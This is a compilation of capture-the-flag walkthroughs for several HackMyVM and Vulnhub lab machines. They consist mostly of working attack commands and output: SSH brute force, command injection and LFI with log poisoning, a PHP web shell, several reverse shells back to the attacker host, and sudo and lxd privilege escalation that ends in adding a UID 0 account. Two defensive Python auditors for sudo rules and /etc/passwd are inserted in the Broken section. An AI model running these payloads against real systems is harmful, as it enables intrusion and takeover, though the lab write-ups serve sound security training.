crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt
```


Brute-force SSH with username athena and this dictionary.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*


Log in via SSH as athena and check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py


Run the Python file; when asked for a seed, enter a command injection payload that spawns a reverse shell.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;


Listen on that port in another terminal and get a root shell.

nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)

HackMyVm Hidden Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Hidden

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
 |   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
 |_  256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Level 1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 cat 80.log
 /index.html           (Status: 200) [Size: 392]

Check index.html: it contains a PNG file and a hint.

[image-20210531194036612.png]

     <body>
         <h1><center>Welcome to level 1</center></h1>
          <center><img src="decodethis_pls.png"></center>
     </body>
     <!-- format xxx.xxxxxx.xxx -->

The PNG is a tic-tac-toe cipher; decode it online.

[image-20210531174854759.png]

Add sys.hidden.hmv to /etc/hosts. Scan port 80 again.

 gobuster dir -u http://sys.hidden.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o sys.hidden.hmv.log
 ...
 /users                (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
 /members              (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
 /index.html           (Status: 200) [Size: 282]
 /weapon               (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]

Scan /weapon.

 gobuster dir -u http://sys.hidden.hmv/weapon -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o weapon.log
 ...
 /index.html           (Status: 200) [Size: 0]
 /loot.php             (Status: 200) [Size: 0]

Fuzz the parameter name of loot.php.

 wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
  ...
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000008724:   200        1 L      3 W        54 Ch       "hack"  

Confirm RCE.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id'
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get reverse shell as www-data.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:39104.
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@hidden:/var/www/hidden/weapon$

Check sudo.

 www-data@hidden:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hidden:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on hidden:
     (toreto) NOPASSWD: /usr/bin/perl

Get a shell as toreto.

 www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
 sudo -u toreto perl -e 'exec "/bin/bash";'
 toreto@hidden:~$ id
 id
 uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)

Upload id_rsa.pub to /home/toreto/.ssh, rename it to authorized_keys and chmod 600 it.

```
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
```


Then log in via SSH as toreto.

ssh toreto@192.168.56.99
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

[ASCII-art banner: Hack_MyVM - Hidden]

Congratulations!!! you have reached the last level!
Good Luck! 😉

Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$


In /home/atenea/.hidden, find a dictionary file.

toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt


Brute-force atenea's password.

hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv

Log in as atenea and check sudo.

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat


Get a root shell using socat.

atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden

Vulnhub Prime (2021): 2 Walkthrough


https://www.vulnhub.com/entry/prime-2021-2,696/

Scan ports.

# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
 Nmap scan report for 192.168.33.139 (192.168.33.139)
 Host is up (0.0041s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
 |   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
 |_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
 80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
 |_http-server-header: Apache/2.4.46 (Ubuntu)
 |_http-title: HackerCTF
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
 |_http-server-header: SimpleHTTP/0.6 Python/3.9.4
 |_http-title: Directory listing for /
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Host script results:
 |_clock-skew: 7h59m59s
 |_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-05-12T18:00:05
 |_  start_date: N/A

List the SMB shares.

 smbclient -L 192.168.33.139
 Enter WORKGROUP\kali's password:

         Sharename       Type      Comment
         ---------       ----      -------
         print$          Disk      Printer Drivers
         welcome         Disk      Welcome to Hackerctf LAB
         IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
 SMB1 disabled -- no workgroup available

Found shell.php in /upload.

 smbclient '\\192.168.33.139\welcome'
 Enter WORKGROUP\kali's password:
 Try "help" to get a list of possible commands.
 smb: \> dir
   .                              D        0  Thu May 13 04:27:52 2021
   ..                             D        0  Sat May 8 02:38:58 2021
   .mysql_history                 H       18  Sat May 8 15:05:03 2021
   .ssh                          DH        0  Thu May 13 04:29:18 2021
   .profile                       H      807  Sat Mar 20 00:02:58 2021
   upload                         D        0  Sun May 9 19:19:02 2021
   .sudo_as_admin_successful      H        0  Sat May 8 13:34:48 2021
   .bash_logout                   H      220  Sat Mar 20 00:02:58 2021
   .cache                        DH        0  Sat May 8 02:39:15 2021
   something                      N       82  Sat May 8 00:18:09 2021
   secrets                        N        0  Sat May 8 00:15:17 2021
   .bash_history                  H       72  Sun May 9 19:23:26 2021
   .bashrc                        H     3771  Sat Mar 20 00:02:58 2021

              19475088 blocks of size 1024. 9885876 blocks available

 smb: \> cd upload
 smb: \upload\> dir
   .                              D        0  Sun May 9 19:19:02 2021
   ..                             D        0  Thu May 13 04:27:52 2021
   shell.php                      A       35  Sun May 9 19:19:02 2021

              19475088 blocks of size 1024. 9885872 blocks available

 smb: \upload\> get shell.php
 getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
 smb: \upload\>


Check shell.php.

 cat shell.php
<?php echo system($_GET['cmd']);?>


The file "something" reveals the user name jarves.

 cat something
I wanted to make it my home directory. But idea must be changed.

Thanks,
jarves


Directory scan of port 80 (gobuster output saved to 80.log).

 cat 80.log
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]


Check the WordPress install with wpscan: one user and one vulnerable plugin are found.

 wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
 ...
 [+] gracemedia-media-player
  | Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/
  | Latest Version: 1.0 (up to date)
  | Last Updated: 2013-07-21T15:09:00.000Z
  | Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
  |     References:
  |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
  |      - https://www.exploit-db.com/exploits/46537/
  |      - https://seclists.org/fulldisclosure/2019/Mar/26

...
[i] User(s) Identified:

[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)


The plugin has an LFI vulnerability, and searchsploit has the matching entry.

 searchsploit gracemedia
 -------------------------------------------------------------------- ----------------------
  Exploit Title                                                      | Path
 -------------------------------------------------------------------- ----------------------
  WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion | php/webapps/46537.txt


Check that the LFI works by reading /etc/passwd.

 curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...


Include the shell.php uploaded through SMB via the same LFI to run commands as www-data. The output appears twice because shell.php calls system(), which prints the command output itself, and then echoes system()'s return value (the last output line).

 curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Visit the following address to spawn a Python reverse shell back to 192.168.33.128:1234.

 http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Get reverse shell.

 nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$

<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Another way to get an SSH login as jarves is to upload authorized_keys into a .ssh directory over SMB: the welcome share is jarves's home directory, as the /home/jarves/upload/shell.php path used above confirms.

smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.


Check jarves's groups: jarves is a member of the lxd group.

jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)


Use the classic lxd group privilege escalation: import an Alpine image, create a privileged container, and mount the host's root filesystem into it at /mnt/root.

lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite


Now we are root.

jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)


Write authorized_keys into /root/.ssh through the mounted host filesystem, then log in as root over SSH.

ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab

HackMyVm Broken Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Broken

Scan ports.

 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
 |   256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
 |_  256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 1 disallowed entry
 |_/textpattern
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).

Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ...
 /index.html           (Status: 200) [Size: 3]
 /file.php             (Status: 200) [Size: 0]
 /robots.txt           (Status: 200) [Size: 23]

robots.txt reveals a Textpattern CMS under /textpattern.

 cat robots.txt  
 Disallow: /textpattern

Fuzz the parameter name of file.php for LFI.

 wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000007535:   200        27 L     40 W       1451 Ch     "file"  

Check passwd.

 curl 'http://broken/file.php?file=../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 heart:x:1000:1000:heart,,,:/home/heart:/bin/bash

...

Poison the nginx access log with PHP code by sending it in the User-Agent header.

 curl 'http://broken' -A '<?php system($_GET[c]); ?>'  
 :(

Check that the injected code executes when the log is included through the LFI.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
 ...
 192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)

Use the same path to launch a reverse shell.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'

In another terminal, listen to port and get shell.

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:50004.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo.

 www-data@broken:~/html/textpattern/textpattern$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on broken:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on broken:
     (heart) NOPASSWD: /usr/bin/pydoc3.7

Run pydoc3.7 as heart and escape from its pager to a shell.

 www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
 ...
 :!/bin/sh
 ...
 $ id
 id
 uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 $ pwd
 pwd
 /home/heart
 $

Check sudo again.

 heart@broken:~$ sudo -l
 Matching Defaults entries for heart on broken:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User heart may run the following commands on broken:
     (ALL) NOPASSWD: /usr/bin/patch
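
The three sudo rules seen so far (socat on Hidden, pydoc3.7 and patch on Broken) share one defect: each grants NOPASSWD on a program that can spawn a shell or write arbitrary files as the run-as user. As an added example that is not part of the original walkthrough, here is a small Python checker that parses `sudo -l` output and flags such rules. The catalogue of shell-capable programs is an assumption built only from the binaries abused on this page, not a complete list, and the sample outputs are constructed from the listings quoted above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Assumed catalogue of programs that hand the run-as user's privileges to whoever
# may invoke them; built from the binaries abused in these walkthroughs, so it is
# illustrative, not complete (a real audit would use a GTFOBins-style list).
SHELL_CAPABLE: Dict[str, str] = {
    "socat": "execs an arbitrary program (sudo socat stdin exec:/bin/bash)",
    "pydoc3.7": "opens a pager; :!/bin/sh inside it spawns a shell",
    "patch": "applies an attacker-written diff to any file, e.g. /etc/passwd",
    "python3": "interpreter: runs arbitrary code, and its scripts import writable modules",
    "wine": "runs arbitrary Windows binaries as the run-as user",
}

# One rule line as printed by `sudo -l`: "(runas) TAG: TAG: /path/to/cmd args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


@dataclass
class SudoRule:
    runas: str
    tags: List[str]
    cmd: str


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Return the command rules listed after 'may run the following commands'."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            rules.append(SudoRule(m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def audit_sudo_output(output: str) -> List[Dict[str, str]]:
    """Flag rules whose program can yield a shell or write any file as the run-as user."""
    findings: List[Dict[str, str]] = []
    for rule in parse_sudo_l(output):
        binary = rule.cmd.split()[0].rsplit("/", 1)[-1]
        unrestricted = rule.cmd == "ALL"
        if not unrestricted and binary not in SHELL_CAPABLE:
            continue
        runas_users = set(rule.runas.replace(":", " ").split())  # "(ALL : low)" -> {"ALL", "low"}
        as_root = bool(runas_users & {"root", "ALL"})
        nopasswd = "NOPASSWD" in rule.tags
        findings.append({
            "runas": rule.runas,
            "binary": binary,
            "severity": "critical" if as_root and nopasswd else "high",
            "reason": "unrestricted command" if unrestricted else SHELL_CAPABLE[binary],
        })
    return findings


# Constructed samples that reproduce the sudo -l outputs quoted in these walkthroughs.
SUDO_L_HIDDEN = """Matching Defaults entries for atenea on hidden:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User atenea may run the following commands on hidden:
    (root) NOPASSWD: /usr/bin/socat
"""
SUDO_L_BROKEN_WWW = """User www-data may run the following commands on broken:
    (heart) NOPASSWD: /usr/bin/pydoc3.7
"""
SUDO_L_BROKEN_HEART = """User heart may run the following commands on broken:
    (ALL) NOPASSWD: /usr/bin/patch
"""
# Constructed control case: a rule that gives an attacker nothing useful.
SUDO_L_HARMLESS = """User bob may run the following commands on box:
    (root) /usr/bin/id
"""

if __name__ == "__main__":
    samples = [("hidden", SUDO_L_HIDDEN), ("broken/www-data", SUDO_L_BROKEN_WWW),
               ("broken/heart", SUDO_L_BROKEN_HEART), ("control", SUDO_L_HARMLESS)]
    for name, sample in samples:
        findings = audit_sudo_output(sample)
        if not findings:
            print(f"{name:16} ok       no risky rule")
        for f in findings:
            print(f"{name:16} {f['severity']:8} ({f['runas']}) {f['binary']}: {f['reason']}")
```

The severity split is deliberate: a NOPASSWD rule running as root (or ALL) is a direct root shell, while the pydoc3.7 rule on Broken "only" yields heart, which is why it is rated high rather than critical even though it is the first link in the chain.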

Use patch to insert a new user root2 with UID 0 into /etc/passwd.

 heart@broken:~$ cp /etc/passwd ./passwd_new
 heart@broken:~$ openssl passwd mypass
 qQdUCJYw6ARL6
 heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
 heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
 heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
 patching file /etc/passwd
 heart@broken:~$ su root2
 Password:
 root@broken:/home/heart# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 broken
 root@broken:/home/heart# 
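
What the patch step leaves behind is easy to detect: a second UID 0 account whose password hash sits in /etc/passwd rather than /etc/shadow. As an added example (not from the walkthrough), the following Python checker parses passwd content and reports extra UID 0 entries, hashes stored in the passwd field, empty password fields and duplicate names, and diffs the account list against a baseline. The sample content is constructed from the lines shown on this page; the www-data line is added for realism.

```python
from typing import List, NamedTuple

# Values of the password field that do NOT carry a hash in /etc/passwd:
# "x" = hash lives in /etc/shadow, "*" / "!" / "!!" = locked account.
NO_HASH = {"x", "*", "!", "!!"}


class PasswdEntry(NamedTuple):
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse /etc/passwd content (seven colon-separated fields per line)."""
    entries: List[PasswdEntry] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text: str) -> List[str]:
    """Report accounts that should not exist in a healthy /etc/passwd."""
    findings: List[str] = []
    seen = set()
    for e in parse_passwd(text):
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: extra UID 0 account")
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field (no password needed)")
        elif e.passwd not in NO_HASH and not e.passwd.startswith("!"):
            findings.append(f"{e.name}: password hash stored in /etc/passwd instead of /etc/shadow")
        if e.name in seen:
            findings.append(f"{e.name}: duplicate user name")
        seen.add(e.name)
    return findings


def added_accounts(baseline: str, current: str) -> List[str]:
    """Names present in the current file but not in the baseline (what the patch step adds)."""
    before = {e.name for e in parse_passwd(baseline)}
    return [e.name for e in parse_passwd(current) if e.name not in before]


# Constructed sample: /etc/passwd lines shown on this page, before and after the patch.
PASSWD_BEFORE = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
heart:x:1000:1000:heart,,,:/home/heart:/bin/bash
"""
PASSWD_AFTER = PASSWD_BEFORE + "root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash\n"

if __name__ == "__main__":
    print("before:", audit_passwd(PASSWD_BEFORE) or "clean")
    print("after: ", audit_passwd(PASSWD_AFTER))
    print("added: ", added_accounts(PASSWD_BEFORE, PASSWD_AFTER))
```

Run against a snapshot of /etc/passwd taken when the host was built, added_accounts is the same diff the attacker produced with `diff -u`, only read in the defender's direction.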

HackMyVm BlackWidow Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=BlackWidow

Nmap scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 Nmap scan report for 192.168.56.100 (192.168.56.100)                                                                  
 Host is up (0.0024s latency).
 Not shown: 65526 closed ports
 PORT      STATE SERVICE    VERSION
 22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 111/tcp   open  rpcbind    2-4 (RPC #100000)
 ...
 2049/tcp  open  nfs_acl    3 (RPC #100227)
 3128/tcp  open  http-proxy Squid http proxy 4.6
 |_http-server-header: squid/4.6
 |_http-title: ERROR: The requested URL could not be retrieved
 38425/tcp open  mountd     1-3 (RPC #100005)
 41727/tcp open  mountd     1-3 (RPC #100005)
 43429/tcp open  nlockmgr   1-4 (RPC #100021)
 55311/tcp open  mountd     1-3 (RPC #100005)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 84]
 /docs                 (Status: 301) [Size: 315] [--> http://192.168.56.100/docs/]  
 /company              (Status: 301) [Size: 318] [--> http://192.168.56.100/company/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]  

Check /company, found started.php.

 ~ gobuster dir -u http://192.168.56.100/company -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80_company.log
 ===============================================================
 /index.html           (Status: 200) [Size: 42271]
 /assets               (Status: 301) [Size: 325] [--> http://192.168.56.100/company/assets/]
 /forms                (Status: 301) [Size: 324] [--> http://192.168.56.100/company/forms/]
 /changelog.txt        (Status: 200) [Size: 1175]
 /Readme.txt           (Status: 200) [Size: 222]
 /started.php          (Status: 200) [Size: 42271]    

Check the source code of /company/index.html.

   <!-- =======================================================
   * Template Name: Arsha - v3.0.3
   * Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
   * Author: BootstrapMade.com
   * License: https://bootstrapmade.com/license/
   ========================================================

   We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.

  -->

Fuzz the file parameter of started.php for LFI with wfuzz.

 ~ wfuzz -u 'http://192.168.56.100/company/started.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt --hh 0
